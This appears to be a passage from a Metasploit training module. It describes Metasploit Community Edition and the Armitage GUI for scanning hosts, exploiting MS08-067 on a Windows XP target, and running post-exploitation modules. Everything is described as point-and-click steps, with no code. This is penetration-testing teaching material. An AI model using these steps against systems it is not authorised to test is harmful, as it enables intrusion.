The Metasploit framework has become the tool of choice for many penetration testers around the globe. With the release of Metasploit Community Edition, a novice user is just a few clicks away from successful exploitation of many vulnerable targets.
In this module, we will be discussing the difference between Metasploit Community Edition and Metasploit Pro, the commercial version of Metasploit. Moreover, we will also be going over the installation and activation of Metasploit Community Edition. Other topics such as scanning, exploitation and post-exploitation will also be discussed!
MSF Community Edition
When it comes to vulnerability verification, penetration testers often have an array of tools at their disposal. Metasploit Community Edition provides us with a graphical user interface (GUI) that simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nessus, Nexpose, and so forth.
MSF Community Scanning
Scanning is an essential part of penetration testing. Often times, attackers go straight into exploitation as they have already obtained the IP address range used by the organization. This is a critical mistake as they have not discovered all of the live hosts or open services. Continuing a penetration test without having a solid understanding all of the live hosts, open services and operating systems being used in the environment will often result in the crash of many production systems. Clearly, we’d like to avoid having to explain to the CIO or CISO how we crashed multiple production systems.
MSF Community Exploitation
So here it is, the exploitation phase! Now that a number of vulnerabilities have been discovered, we can proceed to the fun part, exploitation.
MSF Community Post Exploitation
A number of penetration testers stop at this point since they have obtained obtained a shell with administrative access on the target machine. This is a huge mistake since post-exploitation is just as important as getting that initial shell. Information gathered at this stage can be used to gain access to an organization’s crown jewels. With a session already established with the target machine, we simply click on the Session #, which is 3 in this case.
Armitage is a fantastic GUI front-end for the Metasploit Framework developed by Raphael Mudge with the goal of helping security professionals better understand hacking and to help them realize the power of Metasploit. Further information about this excellent project can be obtained at Armitage’s Official Website.
Armitage is included in BackTrack, so all we need to do is run “armitage” from any command prompt.
To select a scan we wish to run with Armitage, we expand the module tree and double-click on the scanner we wish to use, in this case, “smb_version”, and set our RHOSTS target range.
In the scan we conducted earlier, we see that one of our targets is running Windows XP SP2 so we will attempt to run the exploit for MS08-067 against it. We select the host we would like to attack, find the exploit in the tree, and double-click on it to bring up the configuration for it.
Armitage Post Exploitation
Often times, penetration testers get too carried away with their initial shell that they forget to perform a thorough check on the machine. They could be attacking a honeypot and would not even know it. This is why post-exploitation is essential to every penetration test. Let us explore how we can run post exploitation modules through Armitage.
With shell access to the machine, post exploitation becomes relatively easy. We simply select the post exploitation module we’d like to run by double-clicking on it, and then click on ‘Launch’.